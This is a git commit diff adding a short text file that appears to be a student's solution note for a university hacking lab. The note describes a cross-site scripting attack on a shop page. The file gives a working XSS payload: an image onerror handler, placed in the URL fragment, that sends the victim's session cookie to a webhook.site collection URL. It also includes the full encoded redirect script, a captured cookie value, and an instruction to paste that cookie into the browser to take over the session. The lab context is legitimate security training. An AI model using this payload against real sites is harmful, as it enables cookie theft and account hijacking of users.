initial

2025-12-15 13:31:12 +01:00
commit 26e0102f58
10165 changed files with 233472 additions and 0 deletions
--- a/1/rhine1.txt
+++ b/1/rhine1.txt
@@ -0,0 +1,13 @@
+insert into board:
+
+script -> set url location: 
+rhine1.site/shop#URLENCODE{<img src='x' onerror='window.location.href = "https://webhook.site/39f8d1d8-e3e7-4c32-9277-005c238a2774?cookie="+document.cookie'>}
+
+fragment gets added to innerHtml, image onerror executes
+
+example:
+<script>window.location.href = "https://rhine1.web1.stud12.hacklab.ias.tu-bs.de/shop#%3Cimg%20src%3D%27x%27%20onerror%3D%27window.location.href%20%3D%20%22https%3A%2F%2Fwebhook.site%2F39f8d1d8-e3e7-4c32-9277-005c238a2774%3Fcookie%3D%22%2Bdocument.cookie%27%3E"</script>
+
+paste cookie in developer tools: s:hb1XF3Cy37MqRVhewjDdi-dX7UC7vHiM.5oZAUJT5TCFaSLCVlZYiAlh/9TsGF62Vnq5hBjop+08
+
+